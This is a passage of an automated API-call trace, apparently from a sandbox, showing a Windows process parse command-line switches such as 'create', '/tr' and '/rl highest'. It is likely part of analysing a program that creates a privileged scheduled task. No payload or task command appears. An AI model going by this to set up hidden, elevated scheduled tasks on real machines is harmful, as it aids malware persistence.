_Size=0x7) returned 0 [0074.056] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|u|") returned 3 [0074.056] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|rl|") returned 4 [0074.056] lstrlenW (lpString="|u|") returned 3 [0074.056] lstrlenW (lpString="|rl|") returned 4 [0074.056] SetLastError (dwErrCode=0x490) [0074.056] lstrlenW (lpString="p") returned 1 [0074.056] lstrlenW (lpString="p") returned 1 [0074.056] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.056] lstrlenW (lpString="rl") returned 2 [0074.056] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.056] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|p|") returned 3 [0074.056] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|rl|") returned 4 [0074.056] lstrlenW (lpString="|p|") returned 3 [0074.056] lstrlenW (lpString="|rl|") returned 4 [0074.056] SetLastError (dwErrCode=0x490) [0074.057] lstrlenW (lpString="ru") returned 2 [0074.057] lstrlenW (lpString="ru") returned 2 [0074.057] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.057] lstrlenW (lpString="rl") returned 2 [0074.057] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.057] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|ru|") returned 4 [0074.057] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|rl|") returned 4 [0074.057] lstrlenW (lpString="|ru|") returned 4 [0074.057] lstrlenW (lpString="|rl|") returned 4 [0074.057] StrStrIW (lpFirst="|ru|", lpSrch="|rl|") returned 0x0 [0074.057] SetLastError (dwErrCode=0x490) [0074.057] lstrlenW (lpString="rp") returned 2 [0074.057] lstrlenW (lpString="rp") returned 2 [0074.057] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.057] lstrlenW (lpString="rl") returned 2 [0074.057] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.057] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|rp|") returned 4 [0074.057] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|rl|") returned 4 [0074.057] lstrlenW (lpString="|rp|") returned 4 [0074.057] lstrlenW (lpString="|rl|") returned 4 [0074.057] StrStrIW (lpFirst="|rp|", lpSrch="|rl|") returned 0x0 [0074.057] SetLastError (dwErrCode=0x490) [0074.057] lstrlenW (lpString="sc") returned 2 [0074.057] lstrlenW (lpString="sc") returned 2 [0074.057] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.057] lstrlenW (lpString="rl") returned 2 [0074.057] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.057] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|sc|") returned 4 [0074.057] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|rl|") returned 4 [0074.057] lstrlenW (lpString="|sc|") returned 4 [0074.057] lstrlenW (lpString="|rl|") returned 4 [0074.057] StrStrIW (lpFirst="|sc|", lpSrch="|rl|") returned 0x0 [0074.057] SetLastError (dwErrCode=0x490) [0074.057] lstrlenW (lpString="mo") returned 2 [0074.057] lstrlenW (lpString="mo") returned 2 [0074.058] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.058] lstrlenW (lpString="rl") returned 2 [0074.058] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.058] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|mo|") returned 4 [0074.058] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|rl|") returned 4 [0074.058] lstrlenW (lpString="|mo|") returned 4 [0074.058] lstrlenW (lpString="|rl|") returned 4 [0074.058] StrStrIW (lpFirst="|mo|", lpSrch="|rl|") returned 0x0 [0074.058] SetLastError (dwErrCode=0x490) [0074.058] lstrlenW (lpString="d") returned 1 [0074.058] lstrlenW (lpString="d") returned 1 [0074.058] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.058] lstrlenW (lpString="rl") returned 2 [0074.058] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.058] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|d|") returned 3 [0074.058] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|rl|") returned 4 [0074.058] lstrlenW (lpString="|d|") returned 3 [0074.058] lstrlenW (lpString="|rl|") returned 4 [0074.058] SetLastError (dwErrCode=0x490) [0074.058] lstrlenW (lpString="m") returned 1 [0074.058] lstrlenW (lpString="m") returned 1 [0074.058] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.058] lstrlenW (lpString="rl") returned 2 [0074.058] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.058] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|m|") returned 3 [0074.058] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|rl|") returned 4 [0074.058] lstrlenW (lpString="|m|") returned 3 [0074.058] lstrlenW (lpString="|rl|") returned 4 [0074.058] SetLastError (dwErrCode=0x490) [0074.058] lstrlenW (lpString="i") returned 1 [0074.059] lstrlenW (lpString="i") returned 1 [0074.059] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.059] lstrlenW (lpString="rl") returned 2 [0074.059] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.059] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|i|") returned 3 [0074.059] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|rl|") returned 4 [0074.059] lstrlenW (lpString="|i|") returned 3 [0074.059] lstrlenW (lpString="|rl|") returned 4 [0074.059] SetLastError (dwErrCode=0x490) [0074.059] lstrlenW (lpString="tn") returned 2 [0074.059] lstrlenW (lpString="tn") returned 2 [0074.059] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.059] lstrlenW (lpString="rl") returned 2 [0074.059] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.059] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|tn|") returned 4 [0074.059] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|rl|") returned 4 [0074.059] lstrlenW (lpString="|tn|") returned 4 [0074.059] lstrlenW (lpString="|rl|") returned 4 [0074.059] StrStrIW (lpFirst="|tn|", lpSrch="|rl|") returned 0x0 [0074.059] SetLastError (dwErrCode=0x490) [0074.059] lstrlenW (lpString="tr") returned 2 [0074.059] lstrlenW (lpString="tr") returned 2 [0074.059] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.059] lstrlenW (lpString="rl") returned 2 [0074.059] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.059] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|tr|") returned 4 [0074.059] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|rl|") returned 4 [0074.060] lstrlenW (lpString="|tr|") returned 4 [0074.060] lstrlenW (lpString="|rl|") returned 4 [0074.060] StrStrIW (lpFirst="|tr|", lpSrch="|rl|") returned 0x0 [0074.060] SetLastError (dwErrCode=0x490) [0074.060] lstrlenW (lpString="st") returned 2 [0074.060] lstrlenW (lpString="st") returned 2 [0074.060] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.060] lstrlenW (lpString="rl") returned 2 [0074.060] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.060] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|st|") returned 4 [0074.060] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|rl|") returned 4 [0074.060] lstrlenW (lpString="|st|") returned 4 [0074.060] lstrlenW (lpString="|rl|") returned 4 [0074.060] StrStrIW (lpFirst="|st|", lpSrch="|rl|") returned 0x0 [0074.060] SetLastError (dwErrCode=0x490) [0074.060] lstrlenW (lpString="sd") returned 2 [0074.060] lstrlenW (lpString="sd") returned 2 [0074.060] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.060] lstrlenW (lpString="rl") returned 2 [0074.060] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.060] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|sd|") returned 4 [0074.060] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|rl|") returned 4 [0074.060] lstrlenW (lpString="|sd|") returned 4 [0074.060] lstrlenW (lpString="|rl|") returned 4 [0074.060] StrStrIW (lpFirst="|sd|", lpSrch="|rl|") returned 0x0 [0074.060] SetLastError (dwErrCode=0x490) [0074.077] lstrlenW (lpString="ed") returned 2 [0074.077] lstrlenW (lpString="ed") returned 2 [0074.077] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.078] lstrlenW (lpString="rl") returned 2 [0074.078] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.078] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|ed|") returned 4 [0074.078] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|rl|") returned 4 [0074.078] lstrlenW (lpString="|ed|") returned 4 [0074.078] lstrlenW (lpString="|rl|") returned 4 [0074.078] StrStrIW (lpFirst="|ed|", lpSrch="|rl|") returned 0x0 [0074.078] SetLastError (dwErrCode=0x490) [0074.078] lstrlenW (lpString="it") returned 2 [0074.078] lstrlenW (lpString="it") returned 2 [0074.078] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.078] lstrlenW (lpString="rl") returned 2 [0074.078] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.078] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|it|") returned 4 [0074.078] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|rl|") returned 4 [0074.078] lstrlenW (lpString="|it|") returned 4 [0074.078] lstrlenW (lpString="|rl|") returned 4 [0074.078] StrStrIW (lpFirst="|it|", lpSrch="|rl|") returned 0x0 [0074.078] SetLastError (dwErrCode=0x490) [0074.078] lstrlenW (lpString="et") returned 2 [0074.078] lstrlenW (lpString="et") returned 2 [0074.078] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.078] lstrlenW (lpString="rl") returned 2 [0074.078] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.078] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|et|") returned 4 [0074.078] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|rl|") returned 4 [0074.079] lstrlenW (lpString="|et|") returned 4 [0074.079] lstrlenW (lpString="|rl|") returned 4 [0074.079] StrStrIW (lpFirst="|et|", lpSrch="|rl|") returned 0x0 [0074.079] SetLastError (dwErrCode=0x490) [0074.079] lstrlenW (lpString="k") returned 1 [0074.079] lstrlenW (lpString="k") returned 1 [0074.079] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.079] lstrlenW (lpString="rl") returned 2 [0074.079] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.079] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|k|") returned 3 [0074.079] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|rl|") returned 4 [0074.079] lstrlenW (lpString="|k|") returned 3 [0074.079] lstrlenW (lpString="|rl|") returned 4 [0074.079] SetLastError (dwErrCode=0x490) [0074.079] lstrlenW (lpString="du") returned 2 [0074.079] lstrlenW (lpString="du") returned 2 [0074.079] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.079] lstrlenW (lpString="rl") returned 2 [0074.079] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.079] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|du|") returned 4 [0074.079] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|rl|") returned 4 [0074.079] lstrlenW (lpString="|du|") returned 4 [0074.079] lstrlenW (lpString="|rl|") returned 4 [0074.079] StrStrIW (lpFirst="|du|", lpSrch="|rl|") returned 0x0 [0074.079] SetLastError (dwErrCode=0x490) [0074.079] lstrlenW (lpString="ri") returned 2 [0074.079] lstrlenW (lpString="ri") returned 2 [0074.079] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.079] lstrlenW (lpString="rl") returned 2 [0074.079] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.079] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|ri|") returned 4 [0074.079] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|rl|") returned 4 [0074.079] lstrlenW (lpString="|ri|") returned 4 [0074.079] lstrlenW (lpString="|rl|") returned 4 [0074.079] StrStrIW (lpFirst="|ri|", lpSrch="|rl|") returned 0x0 [0074.079] SetLastError (dwErrCode=0x490) [0074.080] lstrlenW (lpString="z") returned 1 [0074.080] lstrlenW (lpString="z") returned 1 [0074.080] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.080] lstrlenW (lpString="rl") returned 2 [0074.080] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.080] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|z|") returned 3 [0074.080] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|rl|") returned 4 [0074.080] lstrlenW (lpString="|z|") returned 3 [0074.080] lstrlenW (lpString="|rl|") returned 4 [0074.080] SetLastError (dwErrCode=0x490) [0074.080] lstrlenW (lpString="f") returned 1 [0074.080] lstrlenW (lpString="f") returned 1 [0074.080] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.080] lstrlenW (lpString="rl") returned 2 [0074.080] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.080] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|f|") returned 3 [0074.080] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|rl|") returned 4 [0074.080] lstrlenW (lpString="|f|") returned 3 [0074.080] lstrlenW (lpString="|rl|") returned 4 [0074.080] SetLastError (dwErrCode=0x490) [0074.080] lstrlenW (lpString="v1") returned 2 [0074.080] lstrlenW (lpString="v1") returned 2 [0074.080] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.080] lstrlenW (lpString="rl") returned 2 [0074.080] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.080] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|v1|") returned 4 [0074.080] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|rl|") returned 4 [0074.080] lstrlenW (lpString="|v1|") returned 4 [0074.080] lstrlenW (lpString="|rl|") returned 4 [0074.080] StrStrIW (lpFirst="|v1|", lpSrch="|rl|") returned 0x0 [0074.080] SetLastError (dwErrCode=0x490) [0074.080] lstrlenW (lpString="xml") returned 3 [0074.080] lstrlenW (lpString="xml") returned 3 [0074.080] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.081] lstrlenW (lpString="rl") returned 2 [0074.081] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.081] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|xml|") returned 5 [0074.081] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|rl|") returned 4 [0074.081] lstrlenW (lpString="|xml|") returned 5 [0074.081] lstrlenW (lpString="|rl|") returned 4 [0074.081] StrStrIW (lpFirst="|xml|", lpSrch="|rl|") returned 0x0 [0074.081] SetLastError (dwErrCode=0x490) [0074.081] lstrlenW (lpString="ec") returned 2 [0074.081] lstrlenW (lpString="ec") returned 2 [0074.081] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.081] lstrlenW (lpString="rl") returned 2 [0074.081] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.081] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|ec|") returned 4 [0074.081] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|rl|") returned 4 [0074.081] lstrlenW (lpString="|ec|") returned 4 [0074.081] lstrlenW (lpString="|rl|") returned 4 [0074.081] StrStrIW (lpFirst="|ec|", lpSrch="|rl|") returned 0x0 [0074.081] SetLastError (dwErrCode=0x490) [0074.081] lstrlenW (lpString="rl") returned 2 [0074.081] lstrlenW (lpString="rl") returned 2 [0074.081] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.081] lstrlenW (lpString="rl") returned 2 [0074.081] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.081] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|rl|") returned 4 [0074.081] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|rl|") returned 4 [0074.082] lstrlenW (lpString="|rl|") returned 4 [0074.082] lstrlenW (lpString="|rl|") returned 4 [0074.082] StrStrIW (lpFirst="|rl|", lpSrch="|rl|") returned="|rl|" [0074.082] SetLastError (dwErrCode=0x0) [0074.082] SetLastError (dwErrCode=0x0) [0074.082] lstrlenW (lpString="highest") returned 7 [0074.082] lstrlenW (lpString="-/") returned 2 [0074.082] StrChrIW (lpStart="-/", wMatch=0x68) returned 0x0 [0074.082] SetLastError (dwErrCode=0x490) [0074.082] SetLastError (dwErrCode=0x490) [0074.082] SetLastError (dwErrCode=0x0) [0074.082] lstrlenW (lpString="highest") returned 7 [0074.082] StrChrIW (lpStart="highest", wMatch=0x3a) returned 0x0 [0074.082] SetLastError (dwErrCode=0x490) [0074.082] SetLastError (dwErrCode=0x0) [0074.082] _memicmp (_Buf1=0x2d4d98, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.082] lstrlenW (lpString="highest") returned 7 [0074.082] lstrlenW (lpString="highest") returned 7 [0074.082] lstrlenW (lpString=" \x09") returned 2 [0074.082] StrChrW (lpStart=" \x09", wMatch=0x68) returned 0x0 [0074.082] StrChrW (lpStart=" \x09", wMatch=0x68) returned 0x0 [0074.082] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0074.082] StrChrW (lpStart=" \x09", wMatch=0x67) returned 0x0 [0074.082] StrChrW (lpStart=" \x09", wMatch=0x68) returned 0x0 [0074.082] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0074.082] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0074.082] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0074.082] GetLastError () returned 0x0 [0074.082] lstrlenW (lpString="highest") returned 7 [0074.082] lstrlenW (lpString="highest") returned 7 [0074.082] SetLastError (dwErrCode=0x0) [0074.082] SetLastError (dwErrCode=0x0) [0074.083] lstrlenW (lpString="/tr") returned 3 [0074.083] lstrlenW (lpString="-/") returned 2 [0074.083] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0074.083] lstrlenW (lpString="create") returned 6 [0074.083] lstrlenW (lpString="create") returned 6 [0074.083] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.083] lstrlenW (lpString="tr") returned 2 [0074.083] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.083] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x9, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|create|") returned 8 [0074.083] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|tr|") returned 4 [0074.083] lstrlenW (lpString="|create|") returned 8 [0074.083] lstrlenW (lpString="|tr|") returned 4 [0074.083] StrStrIW (lpFirst="|create|", lpSrch="|tr|") returned 0x0 [0074.083] SetLastError (dwErrCode=0x490) [0074.083] lstrlenW (lpString="?") returned 1 [0074.083] lstrlenW (lpString="?") returned 1 [0074.083] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.083] lstrlenW (lpString="tr") returned 2 [0074.083] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.083] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|?|") returned 3 [0074.083] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|tr|") returned 4 [0074.083] lstrlenW (lpString="|?|") returned 3 [0074.083] lstrlenW (lpString="|tr|") returned 4 [0074.083] SetLastError (dwErrCode=0x490) [0074.083] lstrlenW (lpString="s") returned 1 [0074.083] lstrlenW (lpString="s") returned 1 [0074.083] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.083] lstrlenW (lpString="tr") returned 2 [0074.083] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.083] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|s|") returned 3 [0074.083] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|tr|") returned 4 [0074.083] lstrlenW (lpString="|s|") returned 3 [0074.084] lstrlenW (lpString="|tr|") returned 4 [0074.084] SetLastError (dwErrCode=0x490) [0074.084] lstrlenW (lpString="u") returned 1 [0074.084] lstrlenW (lpString="u") returned 1 [0074.084] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.084] lstrlenW (lpString="tr") returned 2 [0074.084] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.084] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|u|") returned 3 [0074.084] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|tr|") returned 4 [0074.084] lstrlenW (lpString="|u|") returned 3 [0074.084] lstrlenW (lpString="|tr|") returned 4 [0074.084] SetLastError (dwErrCode=0x490) [0074.084] lstrlenW (lpString="p") returned 1 [0074.084] lstrlenW (lpString="p") returned 1 [0074.084] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.084] lstrlenW (lpString="tr") returned 2 [0074.084] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.084] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|p|") returned 3 [0074.084] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|tr|") returned 4 [0074.084] lstrlenW (lpString="|p|") returned 3 [0074.084] lstrlenW (lpString="|tr|") returned 4 [0074.084] SetLastError (dwErrCode=0x490) [0074.084] lstrlenW (lpString="ru") returned 2 [0074.084] lstrlenW (lpString="ru") returned 2 [0074.084] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.084] lstrlenW (lpString="tr") returned 2 [0074.084] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.084] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|ru|") returned 4 [0074.084] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|tr|") returned 4 [0074.084] lstrlenW (lpString="|ru|") returned 4 [0074.084] lstrlenW (lpString="|tr|") returned 4 [0074.084] StrStrIW (lpFirst="|ru|", lpSrch="|tr|") returned 0x0 [0074.084] SetLastError (dwErrCode=0x490) [0074.084] lstrlenW (lpString="rp") returned 2 [0074.085] lstrlenW (lpString="rp") returned 2 [0074.085] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.085] lstrlenW (lpString="tr") returned 2 [0074.085] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.085] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|rp|") returned 4 [0074.085] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbc994 | out: _Buffer="|tr|") returned 4 [0074.085] lstrlenW (lpString="|rp|") returned 4 [0074.085] lstrlenW (lpString="|tr|") returned 4 [0074.085] StrStrIW (lpFirst="|rp|", lpSrch="|tr|") returned 0x0 [0074.085] SetLastError (dwErrCode=0x490) [0074.085] lstrlenW (lpString="sc") returned 2 [0074.085] lstrlenW (lpString="sc") returned 2 [0074.085] _memicmp 